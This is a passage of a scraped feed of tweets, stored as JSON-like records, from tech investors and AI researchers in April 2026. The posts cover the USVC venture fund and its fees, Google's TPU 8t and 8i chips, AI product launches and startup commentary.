example, I didn't know what QSBS was until it was too late. [Frown face.] \n\nAnd I didn't buy Tesla at $2 [panic attack], despite wanting to, because a financial adviser friend told me, \"You shouldn't invest on a feeling, you don't have any edge here.\" \n\nI would tell my prior self: You can't invest EVERYTHING based on vibes, but you can and should absolutely do so now and then. (Note: If you have an addictive personality, this is bad advice. But I am only addicted to X and See's Candies.)\n\nBut I will post the negative comments about the fund. I don't want anyone to ever read me and obtain bad information.\n\nEveryone has to decide for themselves what to do.\n\nI've also learned from experience that if something goes well, nobody sends me money or a box of cigars as a thank you. It was their brilliance that led them to the big gains. If it goes wrong, then the fault is all mine and people hate me for it.\n\nThat's also why I don't even want to post about the fund at all, but here goes.", + "url": "https://nitter.net/Cernovich/status/2047481012826124516#m", + "published_at": "2026-04-24T01:01:28+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitorability of their own models.\n\nhttps://alignment.openai.com/monitorability-evals/", + "url": "https://nitter.net/bobabowen/status/2047473914528563592#m", + "published_at": "2026-04-24T00:33:16+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: I spent the morning digging into USVC fees.\n\nTLDR: In my opinion, there is no lower-cost way to invest in VC other than becoming one. I’m expecting to pay the same or less than it costs to invest in a good VC fund. And a lot less than investing in a fund-of-funds. All while getting the benefits of a fund-of-funds that can do direct, secondary, and fund investments.\n\nCarry. If USVC invests in a fund or SPV, I will pay that manager’s ~20% carry. That’s what I expected. All fund-of-funds do it this way. I’m glad to pay carry to invest with good managers. USVC doesn’t charge additional carry.\n\nDirect investments. There is no underlying carry on USVC’s direct investments and they aim to make this a major portion of the portfolio. This would bring down the blended cost of USVC substantially, compared to a VC fund.\n\nFees. The annual fee in the first year is capped at 2.5%. This includes the fees of the underlying funds that USVC invests in, which is a huge deal. Just investing in a VC fund costs 2-2.5% a year. Also, the fee would be 3.6% but AngelList is subsidizing it in the first year.\n\nThere’s a possibility the annual fee could go up in the future and I’ve told the team that this is extremely confusing and weird, and they are working on it with haste.\n\nOverall, I’m expecting to pay the same or less than it costs to invest in a good VC fund, but I’m actually getting access to a fund-of-funds that can do direct, secondary, and fund investments. A typical fund-of-funds charges another 1/10 (fees/carry) on top of the VC’s 2/20, for a total of 3/30.\n\nSome other things I learned:\n\nEarly-stage. Early-stage deals are planned. I would rather invest now in case those early-stage investments get marked up quickly. These deals will be riskier and more illiquid, so there’s no free lunch here. The current portfolio includes late-stage (OpenAI, Anthropic, xAI) and mid-stage (Sierra, Vercel, Crusoe, Legora).\n\nIlliquidity. This is venture capital. The underlying investments are illiquid. Don’t invest if you’re uncomfortable with illiquidity. That said, USVC is working on redemptions of up to 5% of the fund every quarter. It’s not guaranteed, but if it’s offered, you can choose to get partial liquidity along the way.\n\nInternational. There is a lot of demand from international investors. USVC is not yet set up to accept international investors at scale, but they’re working on it.\n\nSales load. There is no sales load. USVC is only available on usvc dot com and the sales load is waived if you buy through the site. In the future, brokers that list USVC may charge up to a ~3% sales load; that’s how they make their money.\n\nDisclosure: I’m a co-founder of AngelList and have shares in the business.", + "url": "https://nitter.net/nivi/status/2047471220451578132#m", + "published_at": "2026-04-24T00:22:33+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Why the biggest fintech players are in for a shock.\n\n\"The shift is from human UX to agent UX.\n\nIn the past, you won with dashboards, design and user experience.\n\nNow, the buyer is an AI agent, and it only cares about APIs, performance and integration.\n\nThat breaks traditional moats and puts even the biggest fintech players at risk.\" @jasonlk\n\nLove to hear your thoughts @pedroh96 @awxjack @sebatklarna @fintechjunkie", + "url": "https://nitter.net/HarryStebbings/status/2047461264998478113#m", + "published_at": "2026-04-23T23:43:00+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇", + "url": "https://nitter.net/maddenifico/status/2047454244781818205#m", + "published_at": "2026-04-23T23:15:06+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\n\"I used to think MAUs and WAUs did not matter, now I think they are critical.\n\nIn the AI era, usage is the leading indicator of value.\n\nIf your usage is growing faster than revenue, you are building something people truly want.\" @jasonlk\n\nLove to hear your thoughts on this @joshelman @kirbyman01 @Joshuabrowder @an21m @mignano and how your thoughts on what matters changed?", + "url": "https://nitter.net/HarryStebbings/status/2047426032840634830#m", + "published_at": "2026-04-23T21:23:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "RT by @eladgil: How does one make sense of SF?\n\nWe are living through the craziest computing revolution of the last 2 decades....and 95% of the value being created is within a 4-mile radius in SF (h/t @eladgil )\n\nIt's just hard to understand....why is the concentration so high?\n\nWhat is it about this place? There are good reasons that people will offer...good universities, great companies, talent networks, venture capital yada yada yada\n\nBut all of that is hard to emotionally understand.\n\nI tend to try to answer these questions through my own lived experience.\n\nTwo things happened this week that brought it home for me.\n\nOn Wed evening, two GOATS of the design world (@soleio and @rsms ) did a design talk at SPC.\n\nI saw some other GOATS at the talk (@aaron_ , @benbarry )\n\nAnd you realize that these GOATS are just so curious about the world. They just want to build and learn. And give back. And with an air of humility and passion. It's so so cool and inspiring.\n\nAnd then this week we had someone release a mind-bendingly amazing demo of every pixel being generated.\n\nhttps://x.com/zan2434/status/2046982383430496444\n\nPeople were blown away but @eddiejiao_obj and @zan2434 had been jamming creatively for a bunch of time @southpkcommons . \n\nAnd in that entire time, they were surrounded by a culture and environment and ecosystem that says \"that is crazy but my god, if it works, then what could happen\"\n\nThere is wonder, amazement and curiosity.\n\nAnd passion.\n\nI wish this city were cleaner and better governed (but Dan Lurie is crushing).\n\nWe are so lucky to be surrounded by weirdos who love to build.\n\nThis is why we are who we are.", + "url": "https://nitter.net/adityaag/status/2047421448449630379#m", + "published_at": "2026-04-23T21:04:47+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Slightly soppy bromance post but Jason believed in me when I was 18 and at law school still. \n\nThere were next to no signs 20VC was or would be a success. \n\nHe has been a dear friend ever since!", + "url": "https://nitter.net/HarryStebbings/status/2047413285675290984#m", + "published_at": "2026-04-23T20:32:21+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: It's worth pointing out that we have been pushing on large-scale training and asynchronous techniques for the last ~14 years. Here's our NeurIPS 2012 paper where we demonstrated that this approach could be used to train very large neural networks (for the time: 30X larger than any previous neural network), and to spread the training out across thousands of machines in a fault-tolerant manner.\n\nPDF: https://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\nhttps://static.googleusercontent.com/media/research.google.com/en//archive/large_deep_networks_nips2012.pdf\n\n(This paper doesn't get as much attention because we neglected to put it on Arxiv at the time: oops!)", + "url": "https://nitter.net/JeffDean/status/2047408945950802186#m", + "published_at": "2026-04-23T20:15:06+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: TPU 8i is co-designed with our Gemini research team to support low latency inference. Among the attributes that support this are large amounts of on-chip SRAM, enabling more computations to be done on chip without having to go to HBM for weights or KVCache state as often.\n\nThe boardfly network topology (see image below) offers a much lower diameter network to connect all 1152 chips in an 8i pod, by fully connecting all 4 chips on the board together, fully connecting groups of 8 boards together, and then fully connecting 36 groups of 8 boards together. In addition, there is specialized Collectives Acceleration Engine (CAE) circuitry on each chip to offload various kinds of reductions and other global operations from the main computational portion of each chip, reducing on-chip latency by up to 5x.\n\nTogether, these features will offer very high throughput for large-scale models (including MoEs, which often require mapping onto many chips for inference), and will do so at very low latency. This will make agentic workloads and interactive usage really shine on the TPU 8i.", + "url": "https://nitter.net/JeffDean/status/2047407537566495033#m", + "published_at": "2026-04-23T20:09:30+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "R to @JeffDean: First, let's talk about TPU 8t, which is designed for large-scale training and inference throughput.\n\nThe pod size is increased slightly to 9600 chips, and provides ~3X the FP4 performance per pod vs. Ironwood (8t has 121 exaflops/pod vs. 42.5 exaflops/pod for Ironwood). In addition, the ICI network bandwidth is 2X higher per chip and the scale out datacenter networking is 4X higher per chip.\n\nImportantly, this system also offers 2X the performance / watt, continuing the trend of significant energy effiency improvements that we've had for many generations of TPUs (8t offers ~60X the performance/watt as TPU v2).", + "url": "https://nitter.net/JeffDean/status/2047405389856297387#m", + "published_at": "2026-04-23T20:00:58+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "I had a good time discussing yesterday's Google TPU v8t and v8i announcement at Cloud Next with Amin Vahdat along with @AcquiredFM hosts @gilbert\nand @djrosent.\n\nThe blog post announcement has lots of details about these new chips:\n\nhttps://blog.google/innovation-and-ai/infrastructure-and-cloud/google-cloud/eighth-generation-tpu-agentic-era/\n\nHere's a thread of some particular things I'm excited about:", + "url": "https://nitter.net/JeffDean/status/2047403921912873257#m", + "published_at": "2026-04-23T19:55:08+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "\"don't retweet this, don't retweet this, don't retweet this...\"\n\nah fuck it, life imitates art.", + "url": "https://nitter.net/sama/status/2047403771416940715#m", + "published_at": "2026-04-23T19:54:32+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work.\n\nLet us know if you'd like to do it at your company!", + "url": "https://nitter.net/sama/status/2047395562501411058#m", + "published_at": "2026-04-23T19:21:55+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "embers", + "url": "https://nitter.net/sama/status/2047392357482639749#m", + "published_at": "2026-04-23T19:09:11+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: Shadow Milk Cookie’s Mind Blown Jester", + "url": "https://nitter.net/breadstickz1/status/2047389262253855041#m", + "published_at": "2026-04-23T18:56:53+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up to find completed sweep dashboards and samples, never having touched code or a terminal at all", + "url": "https://nitter.net/tszzl/status/2047386955550470245#m", + "published_at": "2026-04-23T18:47:43+00:00" + }, + { + "handle": "sama", + "account": "@sama", + "name": "Sam Altman", + "title": "RT by @sama: New in the Codex app:\n\n- GPT-5.5\n- Browser control\n- Sheets & Slides\n- Docs & PDFs\n- OS-wide dictation\n- Auto-review mode\n\nEnjoy!", + "url": "https://nitter.net/ajambrosino/status/2047381565534322694#m", + "published_at": "2026-04-23T18:26:18+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Congratulations to Lab Digital Fellow Angela Aristidou, Digital Fellow @avi_collis, and Research Scientist @d_vidnguyen for being a part of @GoogleAI's inaugural group of global economic scholars!\n\nhttps://ai.google/economy/ai-economy-researchers/", + "url": "https://nitter.net/DigEconLab/status/2047378514240999569#m", + "published_at": "2026-04-23T18:14:10+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: This study is an important part of Vanishing Culture, the new book OUT TODAY from @internetarchive. 🕳️\n\nRead for free or purchase in print ➡️ https://archive.org/details/vanishing-culture-2026", + "url": "https://nitter.net/internetarchive/status/2047378161860776085#m", + "published_at": "2026-04-23T18:12:46+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "I still think on usability-wise, there is a big gap between \"your thing in the training data\" v.s. \"your thing in the SKILL.md\". Prove me wrong otherwise.", + "url": "https://nitter.net/liuliu/status/2047374234004115719#m", + "published_at": "2026-04-23T17:57:10+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Entrepreneurship is a distributed search job across the surface of commercial opportunities", + "url": "https://nitter.net/eladgil/status/2047373700643844303#m", + "published_at": "2026-04-23T17:55:03+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "Does the $60BN Cursor Deal Make Sense:\n\n\"It actually makes sense when you look at what each side lacks.\n\nOne has explosive revenue but weak margins due to compute and model costs.\n\nThe other has massive compute and models but no real revenue.\n\nPut them together and it solves both problems.\" @rodriscoll\n\nLove to hear your thoughts on this @levie @ttunguz @matanSF @shaunmmaguire @beffjezos @martin_casado", + "url": "https://nitter.net/HarryStebbings/status/2047371926335857036#m", + "published_at": "2026-04-23T17:48:00+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "Big congrats", + "url": "https://nitter.net/eladgil/status/2047365014500389353#m", + "published_at": "2026-04-23T17:20:32+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "My view is the AI boom will only accelerate and is a once in a lifetime transformation\n\nThis is orthogonal to whether many AI companies should exit in next 12-18 months, as some may lack durability vs labs, new entrants, or weird market shifts\n\nhttps://www.businessinsider.com/ai-startup-founders-warning-elad-gilsell-while-boom-lasts-2026-4", + "url": "https://nitter.net/eladgil/status/2047364865527075139#m", + "published_at": "2026-04-23T17:19:56+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "It is a very expensive desire to be a value investor today. \nIt is much easier to be a momentum investor, that is for sure.", + "url": "https://nitter.net/HarryStebbings/status/2047358263868436791#m", + "published_at": "2026-04-23T16:53:42+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "It's been a delight to provide small amounts of advice and suggestions to people working on the Decoupled DiLoCo training system. This approach enables graceful handling of failures in large scale training jobs, by allowing (N-1) / N units to proceed when one fails.\n\nThread ⬇️", + "url": "https://nitter.net/JeffDean/status/2047339995682529313#m", + "published_at": "2026-04-23T15:41:07+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: We launched USVC yesterday and it was one of the most fun days of my career\n\nThousands of people ended up subscribing for literally tens of millions of dollars\n\nWhile most of the reception was positive, there was some interrogation on a few important topics:\n\n1 - The USVC fee structure\n2 - The Investment Strategy\n3 - Support for International Investors\n\nLet's talk about them\n\nThe USVC Fee Structure\n\nIf you have followed me for any amount of time, you'll know this is a personal topic for me.\n\nI've frequently complained about fees in financial services. From VC funds to wealth advisors, I've taken no prisoners in calling these out.\n\nThe last venture capital fund I ran was the only VC fund I know of that raised more than 50M and didn't charge a penny of management fees.\n\nSo how much does USVC actually charge and why it is so much?\n\nUSVC costs 2.5% all-in to investors today\n\nThere are some misconceptions based on reading our prospectus, including:\n\n- A 3% sales load\nPlatforms that offer USVC could charge this if they wanted, but we don't. If you buy on http://USVC.com as everyone yesterday did, you pay no sales load.\n\n- Underlying fund fees\nEarly investments from USVC have been in funds that have their own fees, and these fees are paid by USVC. However, these management fees are already included in the net expense ratio of 2.5%.\n\nIn time, I'm planning to move a meaningful chunk of the portfolio to be direct investments in startups on the cap table which will have 0 underlying fees or carry.\n\nThe 2.5% fee is inclusive of everything, including our management fee.\n\n- The advertised 3.61% today\nRight now, even though you pay 2.5%, it costs us 3.61% to service this product.\n\nThere are two big reasons for this - the underlying fund fees (which we're working to improve with direct investments) and the fact that operationally running these types of funds is very expensive.\n\nWe've decided to absorb the fees excess of 2.5% for at least the first year.\n\nDuring the time, we're going to make more efficient investments and wait for economies of scale to kick in on operational costs.\n\nNow... you may ask: isn't 2.5% still very expensive?\n\nThe answer is... it depends.\n\nTop venture capital firms charge that just on their management fees, and force you to pay that for 10 years.\n\nAnd then they charge 20% of profits on top of that!\n\nWe charge no carry on our direct investments at all, which makes this 2.5% fee attractive for the asset class.\n\nIt's ironic to call this a cash grab when we are subsidizing this product out of our pocket to keep the fees in line\n\nI encourage everyone to go read the full disclosures and prospectus at http://usvc.com.\n\nStay tuned for Part 2 later today on Investment Strategy", + "url": "https://nitter.net/ankurnagpal/status/2047334901033123913#m", + "published_at": "2026-04-23T15:20:52+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: OH MYG GDOODOISU #moeoverload 🥹", + "url": "https://nitter.net/cuckuke/status/2047325302771061148#m", + "published_at": "2026-04-23T14:42:44+00:00" + }, + { + "handle": "ylecun", + "account": "@ylecun", + "name": "Yann LeCun", + "title": "RT by @ylecun: The most dangerous thing in Washington right now isn't just the corruption—it's the retaliation against the people who expose it. When government power is used in ways that appear designed to intimidate a journalist for revealing potential abuses, the message is unmistakable: be quiet or be targeted. That’s how fear replaces truth. That’s how a free press is pushed toward silence. And that’s how democracies start to collapse.", + "url": "https://nitter.net/Weinsteinlaw/status/2047321581966291154#m", + "published_at": "2026-04-23T14:27:57+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "R to @HarryStebbings: Spotify 👉 https://open.spotify.com/episode/6EjWkbt83H2WXhDMjjS7PF\nYoutube 👉 https://youtu.be/s61XVZAt5ns\nApple Podcasts 👉 https://podcasts.apple.com/us/podcast/20vc-cursor-acquired-for-%2460bn-by-xai-anthropic-hits/id958230465?i=1000763211245", + "url": "https://nitter.net/HarryStebbings/status/2047316269465006363#m", + "published_at": "2026-04-23T14:06:50+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "This is the big f**king deal.\n\nCursor acquired for $60BN by xAI\n\nI sat down with @jasonlk and @rodriscoll to discuss the deal, along with the biggest news in tech this week:\n\n- Anthropic Hits $1TRN in Secondary Markets\n- Anthropic Launches Claude Code\n- Rippling Hits $1BN in ARR\n- Cerebras Files for IPO\n\nMy notes below:\n\n1. This $60B deal actually makes sense\n\nThe potential $60 billion acquisition of Cursor by xAI/SpaceX is an industrial \"marriage made in heaven\". Cursor has an exploding business with billions in ARR but \"shitty\" gross margins because they lack their own compute and models. Elon Musk has the massive Colossus GPU data center and a model (Grok) but effectively no revenue, making the vertical integration of these two companies a strategic fix for both.\n\n2. How Claude Design Will Hurt Figma\n\nAnthropic’s Claude Design is a full design application, not just a set of prompts or skills. It poses an existential threat because it allows product and engineering teams to bypass the traditional 30-day designer turnaround. By enabling \"normal people\" to design and move into production immediately, it will \"maim and nibble\" at Figma’s growth over the coming quarters.\n\n3. I used to think MAUs and WAUs were the dumbest metric. Now I think it's the most important.\n\nIn the B2B world, usage metrics like MAUs, WAUs, and DAUs are now more critical than revenue. If usage isn't growing faster than revenue, it's a sign of a struggling startup or \"stealth churn,\" where users have stopped active engagement despite the company still collecting fees. In the AI age, the ultimate test of a product's value is whether people are actually using its AI features daily.\n\n4. Why the biggest fintech players are in for a shock.\n\nExisting moats for fintech giants like Brex and Ramp are weakening as the selection criteria for vendors shifts. Customers are no longer prioritizing a dashboard's UI; they care which API works best with their autonomous AI agents. If a new vendor offers a superior API that allows an \"AI VP of Finance\" to automate tasks like collections, companies will switch vendors in a single week.\n\n5. Agent fabric is the layer that manages all your agents\n\nThe defining 2027 challenge is the \"agent fabric\". The infrastructure needed to manage and secure hundreds of autonomous agents. This gives a massive advantage to incumbents like Salesforce. They are positioning themselves as the trusted governance layer to guardrail agents and prevent them from going rogue", + "url": "https://nitter.net/HarryStebbings/status/2047316267858645088#m", + "published_at": "2026-04-23T14:06:50+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Rapid-Deploy Foldable Solar Panels Deliver Instant Off-Grid Power\nby @amazingthings_\n \n#Sustainability #RenewableEnergy #CleanEnergy", + "url": "https://nitter.net/Ronald_vanLoon/status/2047230765193207816#m", + "published_at": "2026-04-23T08:27:04+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: #AI-generated #Sensors open new paths for early cancer detection\nby Anne Trafton @MIT\n\nLearn more: https://bit.ly/4pvlBPL\n\n#MedTech #Healthcare #HealthTech #Tech #TechForGood", + "url": "https://nitter.net/Ronald_vanLoon/status/2047220936902861168#m", + "published_at": "2026-04-23T07:48:01+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: RIVR Delivery #Robot Sits Down to Drop Packages from the Bottom\nby @rivr_tech\n\n#Robotics #Engineering #ArtificialIntelligence #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047215673680490894#m", + "published_at": "2026-04-23T07:27:06+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: China Deploys Solar #Robot to De-Ice Power Lines in Extreme Mountain Conditions\nby @IntEngineering\n\n#Robotics #Engineering #Innovation #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047208118723936306#m", + "published_at": "2026-04-23T06:57:05+00:00" + }, + { + "handle": "Ronald_vanLoon", + "account": "@Ronald_vanLoon", + "name": "Ronald van Loon", + "title": "RT by @Ronald_vanLoon: Treventus Scan #Robot Digitizes Up to 2,500 Pages Per Hour\nby @AadityaAnand_11\n\n#Robotics #Innovation #EmergingTech #Technology", + "url": "https://nitter.net/Ronald_vanLoon/status/2047199600872665579#m", + "published_at": "2026-04-23T06:23:14+00:00" + }, + { + "handle": "soumithchintala", + "account": "@soumithchintala", + "name": "Soumith Chintala", + "title": "RT by @soumithchintala: Incredible work by Sony published in @Nature today! 🏓\n\nThey’ve built “Ace”, an autonomous ping-pong robot that uses RL and Sony’s vision sensors to achieve expert-level play in ping pong. A huge leap forward for adaptive robotics.\n\nhttps://www.nature.com/articles/s41586-026-10338-5", + "url": "https://nitter.net/hardmaru/status/2047191747793649805#m", + "published_at": "2026-04-23T05:52:02+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "R to @DavidSacks: Full article:\n\nhttps://www.foxnews.com/politics/anthropics-moral-compass-architect-suggested-ai-overcorrection-could-address-historical-injustices", + "url": "https://nitter.net/DavidSacks/status/2047104229773279572#m", + "published_at": "2026-04-23T00:04:16+00:00" + }, + { + "handle": "DavidSacks", + "account": "@DavidSacks", + "name": "David Sacks", + "title": "Reverse discrimination does not undo historical injustices but rather perpetrates new ones against a different set of individuals. This foments social strife and undermines the ideal of America as a meritocracy. AI models should not be taught that this practice is justified.", + "url": "https://nitter.net/DavidSacks/status/2047103978979119580#m", + "published_at": "2026-04-23T00:03:16+00:00" + }, + { + "handle": "CryptoCred", + "account": "@CryptoCred", + "name": "Credible Crypto", + "title": "Dev is posting about price", + "url": "https://nitter.net/CryptoCred/status/2047079463750377958#m", + "published_at": "2026-04-22T22:25:51+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "<3 @infisical", + "url": "https://nitter.net/eladgil/status/2047052737762980083#m", + "published_at": "2026-04-22T20:39:39+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "Introducing USVC - a single basket of high-growth venture capital, for everyone. \n\nNo accreditation required, SEC-registered, and a very low $500 minimum. \n\nIncludes OpenAI, Anthropic, xAI, Sierra, Crusoe, Legora, and Vercel. As USVC adds more companies, investors will own a piece of that too. \n\nLiquidity typically comes when companies exit, but we’re aiming to let investors redeem up to 5% of the fund every quarter. This isn’t guaranteed, but if we can make it work, you won’t be locked up like in a traditional venture fund.\n\nIt runs on AngelList, which already supports $125 billion of investor capital. \n\nAnd I’ve joined USVC as the Chairman of its Investment Committee.\n—\n\nGo back to the 1500s, you set sail for the new world to find tons of gold - that was adventure capital. \n\nEarly-stage technology is the modern version. It says we are going to create something new, and it’s risky. It’s daring.\n\nBut ordinary people can’t invest until it’s old, until it’s no longer interesting, until everybody has access to it. By the time a stock IPOs, most of the alpha is gone. The adventure is gone. Public market investors are literally last in line.\n\nThis problem has become farcical in the last decade. Startups are reaching trillion dollar valuations in the private markets while ordinary investors have their noses up to the glass, wondering when they’ll be let in.\n\nInvesting in private markets isn’t easy. You need feet on the ground. You need judgment built over years. Most people don’t have the patience to wait ten or twenty years for an investment to come to fruition.\n\nBut there is no more productive, harder-working way to deploy a dollar than in true venture capital.\n\nUSVC enables you to invest in venture capital in a broad, accessible, professionally-managed way, through a single basket of innovation, focused on high-growth startups, at all stages. \n\nIt is how you bet on the future of tech: the smartest young people in the world, working insane hours, leveraged to the max, with code, hardware, capital, media, and community. Your dollar doesn’t work harder anywhere.\n\nThere is an old line - in the future, either you are telling a computer what to do, or a computer is telling you what to do. You don’t want to be on the wrong side of that transaction.\n\nUSVC lets you buy the future, but you buy it now. Then you wait, and if you are right, you get paid.\n\nGet access here:\n\nhttp://usvc.com", + "url": "https://nitter.net/naval/status/2046991137022648800#m", + "published_at": "2026-04-22T16:34:52+00:00" + }, + { + "handle": "liuliu", + "account": "@liuliu", + "name": "刘进", + "title": "Ask Codex about Ulysses attention: wow, you know so much and can help me get this communication+spda thing work!\nAsk Codex to implement a segmented file downloader: didn’t even get the completion block hooked up right.", + "url": "https://nitter.net/liuliu/status/2046986486629986435#m", + "published_at": "2026-04-22T16:16:24+00:00" + }, + { + "handle": "naval", + "account": "@naval", + "name": "Naval Ravikant", + "title": "RT by @naval: Announcing my new thing:\n\nI'm launching a new public venture fund\n\nUSVC is built by AngelList with @naval shaping our investment strategy in the technology companies building our future\n\nAnd unlike traditional venture funds, everyone can invest along with just $500:", + "url": "https://nitter.net/ankurnagpal/status/2046961436593713241#m", + "published_at": "2026-04-22T14:36:51+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 founders over 10 years. If I could only invest in five, this would be them: \n\n1. Nik Storonsky (Revolut) \n\n2. @alanchanguk (Fuse Energy) \n\n3. Adam Foroughi (AppLovin) \n\n4. @awxjack (Airwallex) \n\n5. @MaxJunestrand (Legora)\n\nOk one more… \n\n6. @vladtenev (Robinhood) \n\nPS. No order intended.", + "url": "https://nitter.net/HarryStebbings/status/2046938853445959738#m", + "published_at": "2026-04-22T13:07:07+00:00" + }, + { + "handle": "SatoshiBun", + "account": "@SatoshiBun", + "name": "Satoshi", + "title": "RT by @satoshibun: they're about to start making out", + "url": "https://nitter.net/savanaclavv/status/2046771924064186549#m", + "published_at": "2026-04-22T02:03:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: Thanks for coming in today, and for sharing your feedback on my team’s idea!\n\nYour optimistic take on the value that humans will continue to deliver was so refreshing.", + "url": "https://nitter.net/TejuAdeyinka/status/2046761422148018260#m", + "published_at": "2026-04-22T01:22:04+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "What a time to be alive", + "url": "https://nitter.net/eladgil/status/2046722094348771758#m", + "published_at": "2026-04-21T22:45:48+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": "RT by @erikbryn: How do AI agents influence knowledge work?\n\n@SuproteemSarkar's (@UChicago) talk at the DEL Seminar Series is now available on YouTube! Moderated by @erikbryn, Sarkar discusses three projects on the Economics of Applied AI.\n\nWatch here: https://youtu.be/4_T4aTLWtwY", + "url": "https://nitter.net/DigEconLab/status/2046698761221783753#m", + "published_at": "2026-04-21T21:13:05+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "👀", + "url": "https://nitter.net/eladgil/status/2046695194054320150#m", + "published_at": "2026-04-21T20:58:54+00:00" + }, + { + "handle": "HarryStebbings", + "account": "@HarryStebbings", + "name": "Harry Stebbings", + "title": "I have interviewed 1,000 CEOs of the largest companies over the last 10 years. \n\nAdam Foroughi is top 5 I have ever met. Easily. \n\nAppLovin Market Cap: $160BN \n\nRevenue: $5.48BN \n\nEBITDA per Head: $10M\n\nThere is no company on the planet with numbers like AppLovin. \n\nEpisode coming 👇", + "url": "https://nitter.net/HarryStebbings/status/2046684883494600911#m", + "published_at": "2026-04-21T20:17:56+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "The dark alchemy that is loonen sparkling + salt of the earth electrolytes 😱", + "url": "https://nitter.net/eladgil/status/2046674350993223784#m", + "published_at": "2026-04-21T19:36:05+00:00" + }, + { + "handle": "JeffDean", + "account": "@JeffDean", + "name": "Jeff Dean", + "title": "RT by @JeffDean: My friend @JeffDean encouraged me to speak at this event so come join me on May 26 in San Jose! https://bauplanlabs.github.io/SAO-workshop/", + "url": "https://nitter.net/ceo_clickhouse/status/2046673188193701901#m", + "published_at": "2026-04-21T19:31:28+00:00" + }, + { + "handle": "eladgil", + "account": "@eladgil", + "name": "Elad Gil", + "title": "AI for email++", + "url": "https://nitter.net/eladgil/status/2046640542218604783#m", + "published_at": "2026-04-21T17:21:44+00:00" + }, + { + "handle": "erikbryn", + "account": "@erikbryn", + "name": "Erik Brynjolfsson", + "title": 